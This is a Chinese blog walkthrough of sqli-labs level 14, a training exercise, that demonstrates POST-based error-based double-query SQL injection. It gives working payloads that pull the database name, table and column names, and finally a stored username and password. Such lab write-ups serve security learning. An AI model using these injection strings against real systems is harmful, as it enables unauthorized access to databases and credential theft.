sqli-lab(14)

Posted -zhong

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-lab(14)相关的知识,希望对你有一定的参考价值。

技术图片

POST型的 双注入

0X01随便测试一下

在password输入"会报错  "#就不报错了 那么应该是“”的闭合

但是没有回显的值 只有报错的信息 那我们是不是该考虑从报错的语句里面来得到我们的答案

0X02爱之初实验

爆库名

" union select count(*),concat_ws(‘*‘,(select database()),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

有数据库后 开始爆破表名

" union select count(*),concat_ws(‘;‘,(select table_name from information_schema.tables where table_schema=‘security‘),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

limit绕吧 这是不是个数问题 不能用group绕

" union select count(*),concat_ws(‘;‘,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

得到表名后

爆列名

" union select count(*),concat_ws(‘;‘,(select column_name from information_schema.columns where table_name=‘users‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

last 爆破字段 --第一个用户名和密码

" union select count(*),concat_ws(‘,‘,(select username from users limit 0,1),(select password from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

 

以上是关于sqli-lab(14)的主要内容,如果未能解决你的问题,请参考以下文章

VSCode自定义代码片段14——Vue的axios网络请求封装

VSCode自定义代码片段14——Vue的axios网络请求封装

VSCode自定义代码片段14——Vue的axios网络请求封装

关于phpstudy搭建Sqli-lab出现问题汇总

关于phpstudy搭建Sqli-lab出现问题汇总

sqli-lab(13)